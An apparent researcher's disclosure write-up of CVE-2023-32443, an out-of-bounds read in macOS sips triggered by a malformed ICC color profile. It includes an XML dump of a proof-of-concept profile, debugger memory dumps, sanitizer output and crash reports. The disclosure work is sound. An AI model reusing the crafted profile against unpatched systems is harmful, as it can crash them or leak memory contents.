Estimated reading time: 3 minutes
Table of contents
Executive Summary
CVE-2023-32443 | sips – scriptable image processing system. Processing a file may lead to a denial-of-service or potentially disclose memory contents. An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Ventura, Monterey and Big Sur.
CVE-2023-32443
Processing a file may lead to a denial-of-service or potentially disclose memory contents
https://support.apple.com/en-us/HT213843
NIST CVSS 3.1 Severity and Metrics: 8.1 High [NIST]
Prior Art
CVE-2022-26730 | ColorSync
TL;DR
CVE-2022-26730 | ColorSync | Found via PoC Replay of P0-2226 and disassembly of Patch for CVE-2021-30942
CVSS 3.1 Base Score: 8.8
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVE-2023-32443 | sips
ICC Color Profiles are created using a format as specified by the International Color Consortium (ICC).
Application Targets
- (1) sips, ColorSync, Safari, Finder, Instruments and other Applications using ICC Profiles or Graphics Files with ICC Profiles on macOS 11, 12 & 13.
- (2) Apple Developer Instruments programs included memory bugs issues fixed in macOS 13.
- (3) sips is reachable from the Internet based on Fingerprinting like other Image or Document Processing Tools.
- Result of Feedback Reports: 21E258 | 13E113 | Instruments | Crash | .icc | ColorSync | PoC | OE089308559899 | FB9970176 | FB9970191 | FB9971897
CVE-2023-32443 | sips | ICC Sample Profile
Graphical View of a PoC ICC Color Profile for CVE-2023-32443 | sips showing the curveParameters using ColorSync:
sips ICC Profile Dump
./iccDumpProfile cve-2023-32443-variant-003.icc
Profile: 'cve-2023-32443-variant-003.icc'
Profile ID: Profile ID not calculated.
Size: 665236(0xa2694) bytes
Header
------
Attributes: Reflective | Glossy
Cmm: 0x4141 'Hoyt' = 486F7974
Creation Date: 6/5/2023 22:53:30
Creator: 'Hoyt' = 486F7974
Data Color Space: CmykData
Flags EmbeddedProfileFalse | UseWithEmbeddedDataOnly
PCS Color Space: LabData
Platform: Unknown 'Hoyt' = 486F7974
Rendering Intent: Perceptual
Profile Class: OutputClass
Profile SubClass: Not Defined
Version: 2.10
Illuminant: X=0.9642, Y=1.0000, Z=0.8249
Spectral PCS: NoSpectralData
Spectral PCS Range: Not Defined
BiSpectral Range: Not Defined
MCS Color Space: Not Defined
Profile Tags
------------
Tag ID Offset Size
---- ------ ------ ----
profileDescriptionTag 'desc' 300 249
copyrightTag 'cprt' 552 10338
mediaWhitePointTag 'wtpt' 10892 20
AToB0Tag 'A2B0' 10912 89958
AToB1Tag 'A2B1' 100872 89958
BToA0Tag 'B2A0' 190832 145588
BToA1Tag 'B2A1' 336420 145588
BToA2Tag 'B2A2' 482008 145588
gamutTag 'gamt' 627596 37009
deviceModelDescTag 'dmdd' 664608 249
deviceMfgDescTag 'dmnd' 664860 249
AToB2Tag 'A2B2' 10912 89958
Unknown 'dscm' = 6473636D 'dscm' 665112 78
chromaticAdaptationTag 'chad' 665192 44
Tag ('o.ic' = 6F2E6963) not found in profileP0-2225 Profile in XML
<?xml version="1.0" encoding="UTF-8"?>
<IccProfile>
<Header>
<PreferredCMMType>appl</PreferredCMMType>
<ProfileVersion>2.20</ProfileVersion>
<ProfileDeviceClass>scnr</ProfileDeviceClass>
<DataColourSpace>RGB </DataColourSpace>
<PCS>Lab </PCS>
<CreationDateTime>2003-07-151T38807:38807:38807</CreationDateTime>
<PrimaryPlatform>97979797h</PrimaryPlatform>
<ProfileFlags EmbeddedInFile="true" UseWithEmbeddedDataOnly="true" VendorFlags="97979794"/>
<DeviceManufacturer>97979797h</DeviceManufacturer>
<DeviceModel>97979797h</DeviceModel>
<DeviceAttributes ReflectiveOrTransparency="transparency" GlossyOrMatte="matte" MediaPolarity="negative" MediaColour="colour" VendorSpecific="000000000000000I64x"/>
<RenderingIntent>Perceptual</RenderingIntent>
<PCSIlluminant>
<XYZNumber X="-26728.40820312" Y="1.00000000" Z="0.82490540"/>
</PCSIlluminant>
<ProfileCreator>appl</ProfileCreator>
</Header>
<Tags>
<profileDescriptionTag> <PrivateType type="B2A2">
<UnknownData>
000000cc0000012c6d4241200000002000040000000000fc0000000000000000
0000006000000020706172610000000000000000000100007061726100000000
0000000000010000706172610000000000000000000100007061726100000000
00000000000100001111
</UnknownData>
</PrivateType> </profileDescriptionTag>
<PrivateTag TagSignature="dscm"> <PrivateType type="00010000h">
<UnknownData>
7061726100000000000000000001000070617261000000000000000000010000
111111000000000000000000000000000200000000008ad0000000000000902f
00000000000095540000
</UnknownData>
</PrivateType> </PrivateTag>
<mediaWhitePointTag> <PrivateType type="00009A3Ah">
<UnknownData>
0000000000009eda000000000000a331
</UnknownData>
</PrivateType> </mediaWhitePointTag>
<chromaticAdaptationTag> <PrivateType type="">
<UnknownData>
0000a73a000000000000aaee000000000000ae4b000000000000b14c158b0000
0000b3ef33590000
</UnknownData>
</PrivateType> </chromaticAdaptationTag>
<AToB0Tag> <lutBtoAType>
<Channels InputChannels="0" OutputChannels="4"/>
<BCurves>
</BCurves>
<CLUT>
<GridPoints></GridPoints>
<TableData>
0 35536 0 0
</TableData>
</CLUT>
<ACurves>
<ParametricCurve FunctionType="0">
1.00000000
</ParametricCurve>
<ParametricCurve FunctionType="0">
1.00000000
</ParametricCurve>
<ParametricCurve FunctionType="0">
1.00000000
</ParametricCurve>
<ParametricCurve FunctionType="0">
1.00000000
</ParametricCurve>
</ACurves>
</lutBtoAType> </AToB0Tag>
</Tags>
</IccProfile>Out of Bounds Read
The memory contents at this seeded buffer address are repetitive, with the same value (0x61006100) repeated multiple times prior to Fuzzing. This value corresponds to the UTF-16 encoding of the character “a” twice:
(lldb) x/500
0x1c5c881cc: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c881dc: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c881ec: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c881fc: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8820c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8821c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8822c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8823c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8824c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8825c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8826c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8827c: 0x61006100 0x61006100 0x61006100 0x61006100
0x1c5c8828c: 0x61006100 0x61006100When the contents of an application response contain the UTF-16 encoding of the character “a” twice is matched during Fuzzing, the sips application has performed an out of bound read.
CVE-2023-32443 | sips | SEGV on unknown address
DYLD_INSERT_LIBRARIES=/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/14.0.0/lib/darwin/libclang_rt.ubsan_osx_dynamic.dylib sips --verify cve-2022-26730-variant-2.icc
/Users/xss/Documents/new-icc/cve-2022-26730-variant-2.icc
UndefinedBehaviorSanitizer:DEADLYSIGNAL
==19828==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x7fecd280fc50 (pc 0x00010bddabe1 bp 0x7ff7b413c020 sp 0x7ff7b413bf90 T681671)
==19828==The signal is caused by a READ memory access.
#0 0x10bddabe1 (sips:x86_64+0x100018be1)
#1 0x10bdd9947 (sips:x86_64+0x100017947)
#2 0x10bdd17e3 (sips:x86_64+0x10000f7e3)
#3 0x10bdc556c (sips:x86_64+0x10000356c)
#4 0x7ff80623e30f (<unknown module>)
==19828==Register values:
rax = 0x0000000000000001 rbx = 0x0000000063757276 rcx = 0x000000000000002c rdx = 0x0000000000000000
rdi = 0x0000000000000020 rsi = 0x00007fecd280fc50 rbp = 0x00007ff7b413c020 rsp = 0x00007ff7b413bf90
r8 = 0x00000000fffffff4 r9 = 0x0000000000000000 r10 = 0x0000000000000800 r11 = 0x000000010bddb0b8
r12 = 0x0000000000000000 r13 = 0x0000000000000000 r14 = 0x0000000000000698 r15 = 0x0000000000000000
UndefinedBehaviorSanitizer can not provide additional info.
SUMMARY: UndefinedBehaviorSanitizer: SEGV (sips:x86_64+0x100018be1)
==19828==ABORTINGCVE-2023-32443 | sips | PoC Crash Analysis
Thread 0 crashed while executing code in the main dispatch queue (com.apple.main-thread). The crash happened in an application called “sips”. The call stack of the crashed thread is as follows:
The crashing instruction is mov ebx, DWORD PTR [rsi], which moves a 4-byte value from the memory location pointed by the rsi register to the ebx register. The crash occurred because the memory address stored in the rsi register (0x000000020248a970) was invalid, causing a segmentation fault.
CVE-2023-32443 | Sips | PoC
sips --verify cve-2022-26730-variant-3.icc
ThreadSanitizer:DEADLYSIGNAL
==19913==ERROR: ThreadSanitizer: BUS on unknown address (pc 0x00010073ebe1 bp 0x7ff7bf7d8020 sp 0x7ff7bf7d7f90 T686590)
==19913==The signal is caused by a READ memory access.
==19913==Hint: this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used.
#0 <null> <null>:2 (sips:x86_64+0x100018be1)
#1 <null> <null>:2 (sips:x86_64+0x100017947)
#2 <null> <null>:2 (sips:x86_64+0x10000f7e3)
#3 <null> <null>:2 (sips:x86_64+0x10000356c)
#4 <null> <null> (0x7ff80623e30f)
==19913==Register values:
rax = 0x0000000000000001 rbx = 0x0000000063757276 rcx = 0x000000000000002c rdx = 0x0000000000000000
rdi = 0x0000000000000020 rsi = 0x00007b6d00001c50 rbp = 0x00007ff7bf7d8020 rsp = 0x00007ff7bf7d7f90
r8 = 0x00000000fffffff4 r9 = 0x0000000000000000 r10 = 0x0000000000000800 r11 = 0x000000010073f0b8
r12 = 0x0000000000000000 r13 = 0x0000000000000000 r14 = 0x0000000000000698 r15 = 0x0000000000000000
PoC Crash Report
Date/Time: 2023-03-15 10:00:32.3296 -0400
OS Version: macOS 13.2.1 (22D68)
Report Version: 12
Bridge OS Version: 7.2 (20P3045)
Crashed Thread: 0 Dispatch queue: com.apple.main-thread
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x000000020248a970
Exception Codes: 0x0000000000000001, 0x000000020248a970
Termination Reason: Namespace SIGNAL, Code 11 Segmentation fault: 11
Terminating Process: exc handler [12552]
VM Region Info: 0x20248a970 is not in any region. Bytes after previous region: 4294855025 Bytes before following region: 105544488015504
REGION TYPE START - END [ VSIZE] PRT/MAX SHRMOD REGION DETAIL
MALLOC_SMALL 1024a1000-1024a6000 [ 20K] rw-/rwx SM=PRV
---> GAP OF 0x5ffefdb5a000 BYTES
MALLOC_NANO 600000000000-600008000000 [128.0M] rw-/rwx SM=PRV
Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0 sips 0x101c40be1 0x101c28000 + 101345
1 sips 0x101c3f948 0x101c28000 + 96584
2 sips 0x101c377e4 0x101c28000 + 63460
3 sips 0x101c2b56d 0x101c28000 + 13677
4 dyld 0x7ff80623e310 start + 2432
Thread 0 crashed with X86 Thread State (64-bit):
rax: 0x0000000000000001 rbx: 0x0000000063757276 rcx: 0x000000000000002c rdx: 0x0000000000000000
rdi: 0x0000000000000020 rsi: 0x000000020248a970 rbp: 0x00007ff7be2d6060 rsp: 0x00007ff7be2d5fd0
r8: 0x00000000fffffff4 r9: 0x0000000000000000 r10: 0x0000000000000800 r11: 0x0000000101c410b8
r12: 0x0000000000000000 r13: 0x0000000000000000 r14: 0x0000000000000698 r15: 0x0000000000000000
rip: 0x0000000101c40be1 rfl: 0x0000000000010283 cr2: 0x000000020248a970
Logical CPU: 8
Error Code: 0x00000004 (no mapping for user data read)
Trap Number: 14
Thread 0 instruction stream:
f7 76 0c 41 81 cd 00 04-00 00 e9 36 01 00 00 48 .v.A.......6...H
8b 45 88 8b 00 3d 6d 42-41 20 74 1c 3d 6d 41 42 .E...=mBA t.=mAB
20 0f 85 1e 01 00 00 3b-7d a4 48 8b 85 78 ff ff ......;}.H..x..
ff 48 0f 44 45 90 eb 0f-3b 7d a4 48 8b 45 90 48 .H.DE...;}.H.E.H
0f 44 85 78 ff ff ff 0f-b6 00 85 c0 0f 84 f3 00 .D.x............
00 00 89 fe 48 03 75 88-8d 4f 0c 44 39 f1 77 a3 ....H.u..O.D9.w.
[8b]1e 44 8b 7e 04 0f cb-8b 4e 08 81 fb 61 72 61 ..D.~....N...ara <==
70 74 47 81 fb 76 72 75-63 0f 85 bf 00 00 00 0f ptG..vruc.......
c9 44 8d 04 09 41 83 c0-0f 41 83 e0 fc 45 85 ff .D...A...A...E..
74 0d c7 46 04 00 00 00-00 45 09 d5 45 09 d4 44 t..F.....E..E..D
01 c7 44 39 f7 0f 87 58-ff ff ff 44 89 c1 48 01 ..D9...X...D..H.
ce ff c8 75 a3 e9 8b 00-00 00 41 89 c9 66 41 c1 ...u......A..fA.
Binary Images:
0x101c28000 - 0x101c47fff sips (*) <60994dd9-97cd-3b78-9263-343f4ba5e6af> /usr/bin/sips
0x7ff806238000 - 0x7ff8062cccaf dyld (*) <bba77709-6cad-3592-ab03-09d0f7b8610e> /usr/lib/dyld
0x0 - 0xffffffffffffffff ??? (*) <00000000-0000-0000-0000-000000000000> ???Timeline
- Keywords: CVE-2023-32443 |sips | ICC Color Profile, User Controllable Input, Input Validation, Mac, PoC
- Operating System: macOS 13
- Vendor Notification: March 2023
- Vendor Resolution: July 2023
- Vendor Fix: This issue was addressed with improved input validation by Apple
- Vendor Source: https://support.apple.com/en-us/HT213843
- Published: 7/24/2023
- Bug Type == New but Recycled from ColorSync CVE-2022-26730
Knowledgebase
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32443
https://bugs.chromium.org/p/project-zero/issues/detail?id=2226
https://nvd.nist.gov/vuln/detail/CVE-2022-26730
https://nvd.nist.gov/vuln/detail/CVE-2023-32443
You must be logged in to post a comment.